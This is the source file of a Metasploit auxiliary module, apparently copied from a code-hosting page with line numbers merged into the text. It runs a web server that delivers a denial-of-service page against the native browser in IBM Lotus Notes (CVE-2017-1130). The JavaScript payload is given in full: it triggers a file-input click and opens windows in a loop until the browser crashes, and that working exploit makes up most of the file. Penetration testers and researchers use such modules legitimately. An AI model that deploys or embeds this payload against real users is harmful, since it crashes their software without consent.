Path: blob/master/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
19850 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpServer78def initialize(info = {})9super(10update_info(11info,12'Name' => 'IBM Notes Denial Of Service',13'Description' => %q{14This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.15If successful, the browser will crash after viewing the webpage.16},17'License' => MSF_LICENSE,18'Author' => [19'Dhiraj Mishra',20],21'References' => [22['EDB', '42604'],23[ 'CVE', '2017-1130' ]24],25'DisclosureDate' => '2017-08-31',26'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],27'PassiveActions' => [ 'WebServer' ],28'DefaultAction' => 'WebServer',29'Notes' => {30'Stability' => [CRASH_SERVICE_DOWN],31'SideEffects' => [],32'Reliability' => []33}34)35)36end3738def run39exploit # start http server40end4142def setup43@html = %|44<html><body>45<input type="file" id="f">46<script>47var w;48var kins = {};49var i = 1;50f.click();51setInterval("f.click()", 1);52setInterval(function(){53for (var k in kins) {54if (kins[k] && kins[k].status === undefined) {55kins[k].close();56delete kins[k];57}58}59w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');60if (w) {61kins[i] = w;62i++;63}64}, 1);65</script>66</body></html>67|68end6970def on_request_uri(cli, _request)71print_status('Sending response')72send_response(cli, @html)73end74end757677